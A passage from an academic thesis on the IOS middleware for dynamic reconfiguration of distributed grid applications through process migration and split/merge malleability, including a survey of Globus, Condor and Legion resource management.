dynamic settings and to provide the necessary tools to facilitate the way in which
scientific and engineering applications interact with dynamic environments and re-
configure themselves as needed.Reconfiguration in IOS is triggered by a set of de-
centralized agents that form a virtual network topology.IOS is built modularly to
allow the use of different algorithms for agents’ coordination,resource profiling,and
reconfiguration.IOS exposes generic APIs to high-level applications to allow for in-
teroperability with a wide range of applications.We investigated two representative
virtual topologies for inter-agent coordination:a peer-to-peer and a cluster-to-cluster
topology.As opposed to existing approaches,where application reconfiguration has
xiv
mainly been done at a coarse granularity (e.g.,application-level),IOS focuses on mi-
gration at a fine granularity (e.g.,process-level) and introduces a novel reconfiguration
paradigm,malleability,to dynamically change the granularity of an application’s en-
tities.Combining migration and malleability enables more effective,flexible,and
scalable reconfiguration.
IOS has been used to reconfigure actor-oriented applications implemented using
the SALSA programming language and iterative process-oriented applications that
follow the Message Passing Interface (MPI) model.To benefit from IOS reconfig-
uration capabilities,applications need to be amenable to entity migration or mal-
leability.This issue has been addressed in iterative MPI applications by designing
and building a library for process checkpointing,migration,and malleability (PCM)
and integrating it with IOS.Performance results show that adaptive middleware can
be an effective approach to reconfiguring distributed applications with various ratios
of communication to computation in order to improve their performance,and more
effectively utilize dynamic resources.We have measured the middleware overhead
in static environments demonstrating that it is less than 7% on average,yet recon-
figuration on dynamic environments can lead to significant improvement in applica-
tion’s execution time.Performance results also show that taking into consideration
the application’s communication topology in the reconfiguration decision improves
throughput by almost an order of magnitude in benchmark applications with sparse
inter-process connectivity.
xv
CHAPTER 1
Introduction
Computing environments have evolved from single-user environments,to Massively
Parallel Processors (MPPs),to clusters of workstations,to distributed systems,and
recently to grid computing systems.Every transition has been a revolution,allowing
scientists and engineers to solve complex problems and sophisticated applications
that could not be solved before.However every transition has brought along new
challenges,new problems,and also the need for technical innovations.
The evolution of computing systems has led to the current situation,where
millions of machines are interconnected via the Internet with various hardware and
software configurations,capabilities,connection topologies,access policies,etc.The
formidable mix of hardware and software resources in the Internet has fueled re-
searchers’ interest to start investigating novel ways to exploit this abundant pool of
resources in an economic and efficient manner and also to aggregate these distributed
resources to benefit a single application.Grid computing has emerged as an am-
bitious research area to address the problem of efficiently using multi-institutional
pools of resources.Its goal is to allow coordinated and collaborative resource sharing
and problem solving across several institutions to solve large scientific problems that
could not be easily solved within the boundaries of a single institution.The concept
of a computational grid first appeared in the mid-1990’s,proposed as an infrastruc-
ture for advanced science and engineering.This concept has evolved extensively since
then and has encompassed a wide range of applications in both the scientific and
commercial fields [46].Computing power is expected to become in the future a pur-
1
2
chasable commodity,like electrical power.Hence,the analogy often made between
the electrical power grid and the conceptual computational grid.
1.1 Motivation and Research Challenges
New challenges emerge in grid environments,where the computational,storage,
and network resources are inherently heterogeneous,often shared,and have a highly
dynamic nature.Consequently,observed application performance can vary widely and
in unexpected ways.This renders the maintenance of a desired level of application
performance a hard problem.Adapting applications to the changing behavior of
the underlying resources becomes critical to the creation of robust grid applications.
Dynamic application reconfiguration is a mechanism to realize this goal.
We denote by an application’s entity,a self-contained part of a distributed or
parallel application that is running in a given runtime system.Examples include
processes in case of parallel applications,software agents,web services,virtual ma-
chines,or actors in case of actor-based applications.Application’s entities could be
running in the same runtime environment or on different distributed runtime envi-
ronments connected through the network.They could be tightly coupled,exchanging
a lot of messages or loosely coupled,with no or few messages exchanged.Dynamic
reconfiguration implies the ability to modify the mapping between application’s enti-
ties and physical resources and/or modify the granularity of the application’s entities
while the application continues to run without any disruption of service.Applica-
tions should be able to scale up to exploit more resources as they become available or
gracefully shrink down as some resources leave or experience failures.It is impracti-
cal to expect application developers to handle reconfiguration issues given the sheer
size of grid environments and the highly dynamic nature of the resources.Adopt-
ing a middleware-driven approach is imperative to achieving efficient deployment of
applications in a dynamic grid setting.
Application adaptation has been addressed in previous work in a fairly ad-hoc
manner.Usually the code that deals with adaptation is embedded within the ap-
plication or within libraries that are highly application-model dependent.Most of
these strategies require having a good knowledge of the application model and a good
3
knowledge of the execution environments.While these strategies may work for dedi-
cated and fairly static environments,they do not scale up to grid environments that
exhibit larger degrees of heterogeneity,dynamic behavior,and a much larger number
of resources.Recent work has addressed adaptive execution in grids.Most of the
mechanisms proposed have adopted the application stop and restart mechanism;i.e.,
the entire application is stopped,checkpointed,migrated,and restarted in another
hardware configuration (e.g.,see [72,110]).Although this strategy can result in im-
proved performance in some scenarios,more effective adaptivity can be achieved if
migration is supported at a finer granularity.
1.1.1 Mobility and Malleability for Fine-grained Reconfiguration
Reconfigurable distributed applications can opportunistically react to the dy-
namics of their execution environment by migrating data and computation away
from unresponsive or slow resources,or into newly available resources.Application
stop-and-restart can be thought of as application mobility.However,application en-
tity mobility allows applications to be reconfigured with finer granularity.Migrating
entities can thus be easier and more concurrent than migrating a full application.
Additionally,concurrent entity migration is less intrusive.
To illustrate the usefulness of such dynamic application entity mobility,consider
an iterative application computing heat diffusion over a two-dimensional surface.At
each iteration,each cell recomputes its value by applying a function of its current
value and its neighbors’ values.Therefore,processors need to synchronize at every
iteration with their neighbors before they can proceed on to a subsequent iteration.
Consequently,the simulation runs as slow as the slowest processor in the distributed
computation,assuming a uniform distribution of data.Clearly,data distribution
plays an important role in the efficiency of the simulation.Unfortunately,in shared
environments,the load of involved processors is unpredictable,fluctuating as new
jobs enter the system or old jobs complete.
We evaluated the execution time of the heat simulation with and without the
capability of application reconfiguration under a dynamic run-time environment:the
application was run on a cluster and soon after the application started,artificial load
4
Non-reconfigurable Execution Time
Reconfigurable Execution Time
400
600
800
1,000
1,200
1,400
3.812.441.370.95
Time(s)
Data Size (Megabytes)
200
0
Figure 1.1:Execution time without and with autonomous migration in a
dynamic run-time environment.
was introduced in one of the cluster machines.Figure 1.1 shows the speedup obtained
by migrating the slowest process to an available node in a different cluster.
While entity migration can provide significant benefits in performance to dis-
tributed applications over shared and dynamic environments,it is limited by the
granularity of the application’s entities.To illustrate this limitation,we use another
iterative application.This application is run on a dynamic cluster consisting of five
processors (see Figure 1.2).In order to use all the processors,at least one entity
per processor is required.When a processor becomes unavailable,the entity on that
processor can migrate to a different processor.With five entities,regardless of how
migration is done,there will be imbalance of work on the processors,so each iteration
needs to wait for the pair of entities running slower because they share a processor.
In the example,5 entities running on 4 processors was 45% slower than 4 entities
running on 4 processors,with otherwise identical parameters.One alternative to fix
this load imbalance is to increase the number of entities to enable a more even dis-
tribution of entities no matter how many processors are available.In the example of
Figure 1.2,60 entities were used since 60 is divisible by 5,4,3,2 and 1.Unfortunately,
the increased number of entities introduces overhead which causes the application to
run slower,approximately 7.6% slower.Additionally,this approach is not scalable,
as the number of entities required for this scheme is the least common multiple of
different combinations of processor availability.In many cases,the availability of
5
N=5
N=P (SM)
N=P
N=60
80
100
120
140
160
180
54321
Iteration Time(sec)
Number of Processors
60
40
20
0
Figure 1.2:Execution time with different entity granularities in a static
run-time environment.
resources is unknown at the application’s startup so an effective number of entities
cannot be statically determined.Figure 1.2 shows these two approaches compared
to a good distribution of work,one entity per processor.N is the number of entities
and P is the number of processors.N=P with split and merge (SM) capabilities
uses entities with various granularities,while N=P shows the optimal configuration
for this example (with no dynamic reconfiguration and middleware overhead).N=60
and N=5 show the best configuration possible using migration with a fixed number
of entities.In this example,if a fixed number of entities is used,averaged over all
processor configurations,using five entities is 13.2% slower,and using sixty entities
is 7.6% slower.
To illustrate further how process’s granularity impacts the node-level perfor-
mance,we run an iterative application with different numbers of processes on the
same dedicated node.The larger the number of processes,the smaller the data gran-
ularity of each process.Figure 1.3 shows an experiment where the parallelism of
an iterative application was varied on a dual-processor node.In this example,hav-
ing one process per processor did not give the best performance,but increasing the
parallelism beyond a certain point also introduces a performance penalty.
We introduce the concept of mobile malleable entities to solve the problem of
appropriately using resources in the face of a dynamic execution environment where
the available resources may not be known.Instead of having a static number of
entities,malleable entities can split,creating more entities,and merge,reducing the
6
Figure 1.3:Throughput as the process data granularity decreases on a
dedicated node.
number of entities,redistributing data based on these operations.With malleable
entities,the application’s granularity,and as a consequence,the number of entities,
can also be changed dynamically.Applications define how entities split and merge,
while the middleware determines when based on resource availability information,
and what entities to split or merge depending on their communication topologies.As
the dynamic environment of an application changes,in response,the granularity and
data distribution of that application can be changed to utilize its environment most
efficiently.
1.1.2 Middleware-driven Dynamic Application Reconfiguration
There are a number of challenges to enable dynamic reconfiguration in dis-
tributed applications.We divide them into middleware challenges,programming
technology challenges,and the interface between the middleware and the applica-
tions.
7
Middleware-level Challenges
Middleware challenges include the need for continuous and non-intrusive profiling
of the run-time environment resources and to determine when it is expected that an
application reconfiguration will lead to performance improvements or better resource
utilization.A middleware layer needs to accomplish this in a decentralized way,so as
to be scalable.The meta-level information that the middleware manages must include
information on the communication topology of the application entities to co-locate
those that communicate extensively whenever possible,avoiding high-latency commu-
nication.A good compromise must also be found between highly accurate meta-level
information—but potentially very expensive to obtain and with a cost of intrusiveness
to running applications—and partial,inaccurate meta-level information—that may
be cheap to obtain in non-intrusive ways but may lead to far from optimal reconfig-
uration decisions.Since no single policy fits all,modularity is needed to be able to
plug in and fine tune different resource profiling and management policies embedded
in the middleware.
Application-level Challenges
The middleware can only trigger reconfiguration requests to applications that sup-
port them.Programming models advocating for a clean encapsulation of state inside
the application entities and asynchronous communication among entities,make the
process of reconfiguring applications dynamically much more manageable.This is be-
cause there is no need for replicated shared memory consistency protocols and preser-
vation of method invocation stacks upon entity migration.While entity mobility is
relatively easy and transparent for these programming models,entity malleability
requires more cooperation from the application developers as it is highly application-
dependent.For programming models where shared memory or synchronous commu-
nication are used,application programming interfaces need to be defined to enable
developers to specify how application entity mobility and malleability are supported
by specific applications.These models make the reconfiguration process less trans-
parent and sometimes limit the applicability of the approach to specific classes of
applications,e.g.,massively parallel or iterative applications.
8
Cross-cutting Challenges
Finally,applications need to collaborate with the middleware layer by exporting
meta-level information on entity interconnectivity and resource usage and by pro-
viding operations to support potential reconfiguration requests from the middleware
layer.This interface needs to be as generic as possible to accommodate a wide variety
of programming models and application classes.
1.2 Problem Statement and Methodology
The focus of this research is to build a modular framework for middleware-
driven application reconfiguration in dynamic execution environments such as Grids
and shared clusters.The main objectives of this framework are to provide high per-
formance to individual applications in dynamic settings and to provide the necessary
tools to facilitate the way in which scientific and engineering applications interact
with dynamic execution environments and reconfigure themselves as needed.Hence,
such applications will be allowed to benefit from these rapidly evolving systems and
from the wide spectrum of resources available in them.
This research addresses most of the issues described in the previous section
through the following methodology.
A Modular Middleware for Adaptive Execution
The Internet Operating System (IOS) is a middleware framework that has been
built with the goal of addressing the problem of reconfiguring long running applica-
tions in large-scale dynamic settings.Our approach to dynamic reconfiguration is
twofold.On the one hand,the middleware layer is responsible for resource discovery,
monitoring of application-level and resource-level performance,and deciding when,
what,and where to reconfigure applications.On the other hand,the application
layer is responsible for dealing with the operational issues of migration and malleabil-
ity and the profiling of application communication and computational patterns.IOS
is built with modularity in mind to allow the use of different modules for agents
coordination,resource profiling and reconfiguration algorithms in a plug and play
fashion.This feature is very important since there is no “one size fits all” method for
9
performing reconfiguration for a wide range of applications and in highly heteroge-
neous and dynamic environments.IOS is implemented in Java and SALSA [114],an
actor-oriented programming language.IOS agents leverage the autonomous nature of
the actor model and use several coordination constructs and asynchronous message
passing provided by the SALSA language.
Decentralized Coordination of Middleware Agents
IOS embodies resource profiling and reconfiguration decisions into software agents.
IOS agents are capable of organizing themselves into various virtual topologies.De-
centralized coordination is used to allow for scalable reconfiguration.This research
investigates two representative virtual topologies for inter-agent coordination:a peer-
to-peer and a cluster-to-cluster coordination topology [73].The coordination topology
of IOS agents has a great impact on how quickly reconfiguration decisions are made.
In a more structured environment such as a grid of homogeneous clusters,a hierar-
chical topology generally performs better than a purely peer-to-peer topology [73].
Generic Interfaces for Portable Interoperability with Applications
IOS exposes several APIs for profiling applications’ communication patterns and
for triggering reconfiguration actions such as migration and split and merge.These
interfaces shield many of the intrinsic details of reconfiguration from application de-
velopers and provide a unified and clean way of interaction between applications and
the middleware.Any application or programming model that implements IOS generic
interfaces becomes reconfigurable.
A Generic Process Checkpointing,Migration and Malleability Scheme for
Message Passing Applications
Migration or malleability capabailities are highly dependent on the application’s
programming model.Therefore,there has to be built-in library or language-level
support for migration and malleability to allow applications to be reconfigurable.
Part of this research consists of building the necessary tools to allow message passing
applications to become reconfigurable with IOS.A library for process checkpoint-
ing,migration and malleability (PCM) has been designed and developed for MPI
10
iterative applications.The PCM is a user-level library that provides checkpointing,
profiling,migration,split,and merge capabilities for a large class of iterative appli-
cations.Programmers need to specify the data structures that must be saved and
restored to allow process migration and to instrument their application with few PCM
calls.PCM also provides process split and merge functionalities to MPI programs.
Common data distributions are supported like block,cyclic,and block-cyclic.PCM
implements IOS generic profiling and reconfiguration interfaces,and therefore enables
MPI applications to benefit from IOS reconfiguration policies.
The PCM API is simple to use and hides many of the intrinsic details of how
to perform reconfiguration through migration,split and merge.Hence,with mini-
mal code modification,a PCM-instrumented MPI application becomes malleable and
ready to be reconfigured transparently by the IOS middleware.In addition,legacy
MPI applications can benefit tremendously from the reconfiguration features of IOS
by simply inserting a few calls to the PCM API.
1.3 Thesis Contributions
This research has generated a number of original contributions.They are sum-
marized as follows:
1.A modular middleware for application reconfiguration with the goal of main-
taining a reasonable performance in a dynamic environment.The modularity
of our middleware is demonstrated through the use of several reconfiguration
and coordination algorithms.
2.Fine-grained reconfiguration that enables reasoning about application entities
rather than the entire application and therefore provides more concurrent and
efficient adaptation of the application.
3.Decentralized and scalable coordination strategies for middleware agents that
are based on partial knowledge.
4.Generic reconfiguration interfaces for application-level profiling and reconfigu-
ration decisions to allow increased and portable adoption by several program-
ming models and languages.This has been demonstrated through the successful
11
reconfiguration of actor-oriented programs in SALSA and process-oriented pro-
grams using MPI.
5.A portable protocol for inter-operation and interaction between applications
and the middleware to ease the transition to reconfigurable execution in grid
environments.
6.A user-level checkpointing and migration library for MPI applications to help
develop reconfigurable message passing applications.
7.The use of split and merge or malleability as another reconfiguration mechanism
to complement and enhance application adaptation through migration.Support
of malleability in MPI applications developed by this research is the first of its
kind in terms of splitting and merging MPI processes.
8.A resource-sensitive model for deciding when to migrate,split,or merge appli-
cation’s entities.This model enables reasoning about computational resources
in a unified manner.
1.4 Thesis Roadmap
The remainder of this thesis is organized as follows:
• Chapter 2 discusses background and related work in the context of dynamic
reconfiguration of applications in grid environments.It starts by giving a litera-
ture review of emerging grid middleware systems and how they address resource
management.It then reviews existing efforts for application adaptation in dy-
namic grid environments.An overview of programming models that are suitable
for grid environments is given.Finally background information about world-
wide computing,the actor model of computation and the SALSA programming
language is presented.
• Chapter 3 starts first by presenting key design goals that have been fundamen-
tal to the implementation of the Internet Operating System (IOS) middleware.
These include operational and architectural goals at both the middleware-level
12
and application-level.Then the architecture of IOS is explained.This chapter
also explains in details the various modules of IOS and its generic interfaces for
profiling and reconfiguration.
• Chapter 4 presents the different protocols and policies implemented as part
of the middleware infrastructure.The protocols deal with coordinating the
activities of middleware agents and forwarding work-stealing requests in a peer-
to-peer fashion.At the core of the adaptation strategies,a resource-sensitive
model is used to decide when,what and where to reconfigure application entities.
• Chapter 5 explains how iterative MPI-based applications are reconfigured us-
ing IOS.First the checkpointing,migration,and malleability (PCM) library
is presented.The chapter then proceeds by showing how the PCM library is
integrated with IOS and the protocol used to achieve this integration.
• Chapter 6 presents various kinds of experiments conducted in this research
and the results obtained.In the first section,the performance evaluation of
the middleware is given including evaluation of the protocols,scalability,and
overhead.The second section presents various experiments that evaluate the
reconfiguration functionalities of IOS using migration,split and merge,and a
combination of them.
• Chapter 7 concludes this thesis with a discussion of future directions.
CHAPTER 2
Background and Related Work
The deployment of grid infrastructures is a challenging task that goes beyond the
capabilities of application developers.Specialized grid middleware is needed to miti-
gate the complex issues of integrating a large number of dynamic,heterogeneous,and
widely distributed resources.Institutions need sophisticated mechanisms to lever-
age and share their existing information infrastructures in order to be part of public
collaborations.
Grid middleware should address the following issues:
• Security.The absence of central management and the open nature of grid
resources result in having to deal with several administrative domains.Each one
of thembrings along different resource access policies and security requirements.
Being able to access externally-owned resources requires having the necessary
credentials required by the external organizations.Users should be able to log on
once and execute applications across various domains
1
.Furthermore,common
methods for negotiating authorization and authentication are also needed.
• Resource management.Resource management is a fundamental issue for
enabling grid applications.It deals with job submission,scheduling,resource al-
location,resource monitoring,and load balancing.Resources in the grid have a
very transient nature.They can experience constantly changing loads and avail-
1
This capability of being able to log on once instead of logging in all used machines is referred
to in the computational grid community as the single sign-on policy.
13
14
ability because of shared access and the absence of tight user control.Reliable
and efficient execution of applications on such platforms requires application
adaptation to the dynamic nature of the underlying grid environments.Adap-
tive scheduling and load balancing are necessary to achieve high performance
of grid applications and high utilization of systems’ resources.
• Data management.Since grid infrastructures involve widely distributed re-
sources,data and processing might not necessarily be collocated.Concerns
in data management arise such as how to efficiently distribute,replicate,and
access potentially massive amounts of data.
• Information management.Being able to make informed decisions by re-
source managers requires the ability to discover available resources and learn
about their characteristics (capacities,availability,current utilization,access
policies,etc).Grid information services should allow the monitoring and dis-
covery of resources and should make them available when necessary to grid
resource managers.
This chapter focuses mainly on existing research in the area of grid resource
management.The chapter is organized as follows.Section 2.1 surveys existing grid
middleware systems.Section 2.2 discusses related work in resource management in
grid systems.Section 2.3 discusses existing work in adaptive execution of grid appli-
cations.Section 2.4 presents various programming models that are good candidates
for developing grid applications.In Section 2.5,we review basic peer-to-peer concepts
and how they have been used in grid systems.Finally,Section 2.6 gives an overview
about the worldwide computing project and presents several key concepts that have
been fundamental to this dissertation.
2.1 Grid Middleware Systems
Over the last few years,several efforts have focused on building the basic soft-
ware tools to enable resource sharing within scientific collaborations.Among these
efforts,the most successful have been Globus [45],Condor [105],and Legion [29].
15
Figure 2.1:A layered grid architecture and components (Adapted
from [14]).
The Globus toolkit has emerged as the de-facto standard middleware infras-
tructure for grid computing.Globus defines several protocols,APIs,and services
that provide solutions to common grid deployment problems such as authentication,
remote job submission,resource discovery,resource access,and transfer of data and
executables.Globus adopts a layered service model that is analogous to the layered
network model.Figure 2.1 shows the layered grid architecture that the Globus project
adopts.The different layers of this architecture are briefly described in Table 2.1.
Condor is a distributed resource management systemthat is designed to support
high-throughput computing by harvesting idle resource cycles.Condor discovers idle
resources in a network and allocates them to application tasks [104].Fault-tolerance
is also supported through checkpointing mechanisms.
Legion specifies an object-based virtual machine environment that transparently
16
Layer
Description
Grid Fabric
Distributed resources such as clusters,
machines,supercomputers,storage devices,
scientific instruments,etc.
Core Middleware
A bag of services that offer remote process
management,allocation of resources from different
sites to be used by the same application,storage
management,information registration and
discovery,security,and Quality of Service (QoS).
User Level Middleware
A set of interfaces to core middleware services to
provide higher levels of abstractions to end
applications.These include resource brokers,
programming tools,and development environments.
Grid Applications
Applications developed using grid-enabled programming
models such as MPI.
Table 2.1:Layers of the grid architecture.
integrates grid system components into a single address space and file system.Legion
plays the role of a grid operating system by addressing issues such as process man-
agement,input-output operations,inter-process communications,and security [80].
Condor-G [49] combines both Condor and Globus technologies.This merging
combines Condor’s mechanisms for intra-domain resource management and fault-
tolerance with Globus protocols for security,and inter-domain resource discovery,
access,and management.Entropia [30] is another popular system that utilizes cycle
harvesting mechanisms.Entropia adopts similar mechanisms to Condor for resource
allocation,scheduling and job migration.However,it is tailored only for Microsoft
Windows 2000 machines,while Condor is tailored for both Unix and Windows plat-
forms.WebOS [111] is another research effort with the goal of providing operating
system’s services to wide area applications,such as,resource discovery,remote process
execution,resource management,authentication,security,and a global namespace.
2.2 Resource Management in Grid Systems
The nature of grid systems has dictated the need to come up with new mod-
els and protocols for grid resource management.Grid resource management differs
17
from conventional cluster resource management in several aspects.In contrast to
cluster systems,grid systems are inherently more complex,dynamic,heterogeneous,
autonomous,unreliable,and scalable.Several requirements need to be met to achieve
efficient resource management in grid systems:
• Site autonomy.Traditional resource management systems assume tight con-
trol over the resources.These assumptions make it easier to design efficient
policies for scheduling and load balancing.Such assumptions disappear in grid
systems where resources are dispersed across several administrative domains
with different scheduling policies,security mechanisms,and usage patterns.
Additionally,resources in grid systems have a non-deterministic nature.They
might join or leave at any time.It is therefore critical for a grid resource man-
agement system to take all these issues into account and preserve the autonomy
of each participating site.
• Interoperability.Several sites use different local resource management sys-
tems such as the Portable Batch System (PBS),Load Sharing Facility (LSF),
Condor,etc.Meta-schedulers need to be built that are able to interface and
inter-operate with all the different local resource managers.
• Flexibility and extensibility.As systems evolve,new policies get imple-
mented and adopted.The resource management system should be extensible
and flexible to accommodate newer systems.
• Support of negotiation.QoS is an important requirement to meet several
application requirements and guarantees.Negotiation between the different
participating sites is needed to ensure that the local policies will not be broken
and that the running applications will satisfy their requirements with certain
guarantees.
• Fault tolerance.As systems grow in size,the chance of failures becomes
non-negligible.Replication,checkpointing,job restart,or other forms of fault-
tolerance have become a necessity in grid environments.
18
System Architecture Resource QoS and Scheduling
Discovery/Profiling
Dissemination/
Globus Hierarchical Decentralized Partial support of QoS,Decentralized,
query discovery,state estimation relies uses external
periodic push on external tools schedulers for
dissemination such as NWS for intra-domain
profiling and forecasting scheduling
of resources’ performance
Condor Flat Centralized No support of QoS,Centralized
query discovery,matchmaking between
periodic push client requests and
dissemination resources’ capabilities
Legion Hierarchical Decentralized Partial support of QoS,Hierarchical
query discovery,several schedules could
periodic pull be generated,the best is
dissemination selected by the scheduler
Table 2.2:Characteristics of some grid resource management systems.
• Scalability.All resource management algorithms should avoid centralized pro-
tocols to achieve more scalability.Peer-to-peer and hierarchical approaches will
be good candidate protocols.
The subsequent section surveys main grid resource management systems,how
they have addressed some of the above discussed issues,and their limitations.For
each system,we will discuss its mechanisms for resource dissemination,discovery,
scheduling,and profiling.Resource dissemination protocols can be classified as either
using push or pull models.In the push model,information about resources is peri-
odically pushed to a database.The opposite is done in a pull model,where resources
are periodically probed to collect their information about them.Table 2.2 provides a
summary of some characteristics of the resource management features of the surveyed
systems.
2.2.1 Resource Management in Globus
A Globus resource management system consists of resource brokers,resource
co-allocators,and resource managers,also referred to as Globus Resource Alloca-
19
tion Managers (GRAM).The task of co-allocation refers to allocating resources from
different sites or administrative domains to be used by the same application.Dissem-
ination of resources is done through an information service called the Grid Informa-
tion Service (GIS),also known as the Monitoring and Discovery Service (MDS) [36].
MDS uses the Lightweight Directory Access Protocol [34] (LDAP) to interface with
the gathered information about resources.MDS stores information about resources
such as the number of CPUs,the operating systems used,the CPU speeds,the net-
work latencies,etc.MDS consists of a Grid Index Information Service (GIIS) and a
Grid Resource Information Service (GRIS).GRIS provides resource discovery services
such as gathering,generating,and publishing data about resource characteristics in
an MDS directory.GIIS tries to provide a global view about the different information
gathered from various GRIS services.The aim is to make it easy for grid applications
to look-up desired resources and match them to their requirements.GIIS indexes the
resources in a hierarchical name space organization.Resource information is updated
in GIIS by push strategies.Resource brokers discover resources by querying MDS.
Globus relies on local schedulers that implement Globus interfaces to resource
brokers.These schedulers could be application-level schedulers (e.g.AppleS [16]),
batch systems (e.g.PBS),etc.Local schedulers translate application requirements
into a common language,called Resource Specification Language (RSL).RSL is a set
of expressions that specify the jobs and the characteristics of the resources required
to run them.Resource brokers are responsible for taking high level descriptions of
resource requests and translating them into more specialized and concrete specifica-
tions.The transformed request should contain concrete resources and their actual
locations.This process is referred to as specialization.
Specialized resource requests are passed to co-allocators who are responsible for
allocating requests at multiple sites to be used simultaneously by the same applica-
tion.The actual scheduling and execution of submitted jobs is done by the local
schedulers.GRAMauthenticates the resource requests and schedules them using the
local resource managers.GRAMtries to simplify the development and deployment of
grid applications by providing common APIs that hide the details of local schedulers,
queuing systems,interfaces,etc.Grid users and developers do not need to know all
20
the details of other systems.GRAMacts as an entry point to various implementations
of local resource management.It uses the concept of the hour-glass where GRAM is
the neck of the hourglass,with applications and higher-level services (such as resource
brokers or meta-schedulers) above it and local control and access mechanisms below
it.
To sum up,Globus provides a bag of services to simplify resource management
at a meta-level.The actual scheduling needs still be done by the individual resource
brokers.Ensuring that an application efficiently uses resources from various sites
is still a complex task.Developers still need to bear the burden of understanding
the requirements of the application,the characteristics of the grid resources,and the
optimal ways of scheduling the application using dynamic grid resources to achieve
high performance.
2.2.2 Resource Management in Condor
The philosophy of Condor [105] is to maximize the utilization of machines by
harvesting idle cycles.A group of machines managed by a Condor scheduler is called
a Condor pool.Condor uses a centralized scheduling management scheme.A ma-
chine in the pool is dedicated to scheduling and information management.Submitted
jobs are queued and transparently scheduled to run on the available machines of the
pool.Job resource requests are communicated to the manager using the Classified
Advertisements (ClassAds) [35] resource specification language
2
.Attributes such as
processor’s type,operating system,and available memory and disk space are used to
indicate jobs’ resource requirements.
Resource dissemination is done through periodic push mechanisms.Machines
periodically advertise their capabilities and their job preferences in advertisements
that use also ClassAds specification language.When a job is submitted to the Condor
scheduler by a client machine,matchmaking is used to find the jobs and machines
that best suit each other.Information about the chosen resources is then returned to
the client machine.A shadow process is forked in the the client machine to take care
of transferring executables and I/O redirection.
2
The resource specification language used by Globus follows Condor’s model for ClassAds.How-
ever Globus’s language is more flexible and expressive.
21
Flocking [39] is an enhancement of Condor to share idle cycles across several
administrative domains.Flocking allows several pool managers to communicate with
one another and to submit jobs across pools.To overcome the problems of not having
shared file systems,a split-execution model is used:I/O commands generated by a
job are captured and redirected to the shadow process running on the client machine.
This technique avoids transferring files or mounting foreign file systems.
Condor supports job preemption and check-pointing to preserve machine au-
tonomy.Jobs can be preempted and migrated to other machines if their current
machines decide to withdraw from the computation.
Condor adopts the philosophy of high throughput computing (HTC) as opposed
to high performance computing (HPC).In HTC systems,the objective is to maxi-
mize the throughput of the entire system as opposed to maximizing the individual
application response time in HPC systems.A combination of both paradigms should
exist in grids to achieve efficient execution of multi-scale applications.Improving
utilization and overall response and running time for large multi-scale applications
are both important to justify the applicability for grid environments.On the one
hand,application users will not be willing to use grids unless they expect to improve
dramatically their performance.On the other hand,the grid computing vision tries
to minimize idle resources by allowing resource sharing at a large scale.
2.2.3 Resource Management in Legion
Legion [29] is an object-based system that provides an abstraction over wide
area resources as a worldwide virtual computer by playing the role of a grid operating
system.It provides some of the traditional features that an operating systemprovides
in a grid setting such as a global namespace,a shared file system,security,process
creation and management,I/O,resource management,and accounting [80].Every-
thing in Legion is an object,an active process that reacts to function invocations
from other objects in the system.Legion provides high-level specifications and pro-
tocols for object interaction.The implementations still have to be done by the users.
Legion objects are managed by their own class object instances.The class object is
responsible for creating new instances,activating or deactivating them,and schedul-
22
ing them.Legion defines core objects that implement system-level mechanisms:host
objects represent compute resources while vault objects represent persistent storage
resources.
The resource management system in Legion consists of four components:a
scheduler,a schedule implementor,a resource database,and the pool of resources.
Resource dissemination is done through a push model.Resources interact with the
resource database,also called the collection.Users or schedulers obtain information
about resources by querying the collection.For scalability purposes,there might
be more than one collection object.These objects are capable of exchanging infor-
mation about resources.Scheduling in Legion has a hierarchical structure.Higher
level schedulers schedule resources on clusters,while lower-level schedulers sched-
ule jobs on the local resources.When a job is submitted,an appropriate scheduler
(Application-specific scheduler or a default scheduler) is selected fromthe framework.
The scheduler,also called the enactor object is responsible for enforcing the schedule
generated.There might be more than one schedule generated.The best schedule is
selected.When it fails the next best is tried until all the schedules are exhausted.
Similar to Globus,Legion provides a framework for creating,and managing
processes in a grid setting.However,achieving high performance is still a job that
needs to be done by the application developers to make efficient use of the overall
framework.
2.2.4 Other Grid Resource Management Systems
Several resource management systems for grid environments exist beside the dis-
cussed systems.2K [65],is a distributed operating system that is based on CORBA.
It addresses the problems of resource management in heterogeneous networks,dy-
namic adaptability,and configuration of entity-based distributed applications [64].
Bond [60] is a Java distributed agents system.The European DataGrid [56] is a
Globus-based system for the storage and management of data-intensive applications.
Nimrod [5] provides a distributed computing system for parametric modeling that
supports a large number of computational experiments.Nimrod-G [25] is an ex-
tension of Nimrod that uses the Globus services and that follows a computational
23
economical model for scheduling.NetSolve [27] is a system that has been designed
to solve computational science problems through a client-agent-server architecture.
WebOS seeks to provide operating system services,such as client authentication,
naming,and persistent storage to wide area applications [111].
There is a large body of research into computational grids and grid-based mid-
dleware,hence this section only attempts to discuss a selection of this research area.
The reader is referred to [66] and [115] for a more comprehensive survey of systems
geared toward distributed computing on a large-scale.
2.3 Adaptive Execution in Grid Systems
Globus middleware provides services needed for secure multi-site execution of
large-scale applications gluing different resource management systems and access poli-
cies.The dynamic and transient nature of grid systems necessitates adaptive mod-
els to enable the running application to adapt itself to rapidly changing resource
conditions.Adaptivity in grid computing has been mainly addressed by adaptive
application-level scheduling and dynamic load balancing.Several projects have de-
veloped application-oriented adaptive execution mechanisms over Globus to achieve
an efficient exploitation of grid resources.Examples include AppleS [17],Cactus-
G [12],GrADS [40],and GridWay [59].These systems share many features with
differences in the ways they are implemented.
AppleS [17] applications rely on structural performance models that allows pre-
diction of application performance.The approach incorporates static and dynamic
resource information,performance predictions,application and user-specific informa-
tion and scheduling techniques to adapt to application’s execution “on-the-fly”.To
make this approach more generic and reusable,a set of template-based software for a
collection of structurally similar applications has been developed.After performing
the resource selection,the scheduler determines a set of candidate schedules based
on the performance model of the application.The best schedule is selected based
on user’s performance criteria such as execution time and turn-around time.The
schedule generated can be adapted and refined to cope with the changing behavior of
resources.Jacobi2D [18],Complib [94],and Mcell [28] are examples of applications
24
that benefited from the application-level adaptive scheduling of AppleS.
Adaptive grid execution has been also explored in the Cactus project through
support of migration [69].Cactus is an open source problem-solving environment de-
signed for solving partial differential equations.Cactus incorporates,through special
components referred to as grid-aware thorns [11],adaptive resource selection mecha-
nisms to allow applications to change their resource allocations via migration.Cactus
uses also the concept of contract violation.Application migration is triggered when-
ever a contract violation is detected and the resource selector has identified alternative
resources.Checkpointing,staging of executables,allocation of resources,and appli-
cation restart are then performed.Some application-specific techniques were used to
adapt large applications to run on the grid such as adaptive compression,overlapping
computation with communication,and redundant computation [12].
The GrADS project [40] has investigated also adaptive execution in the con-
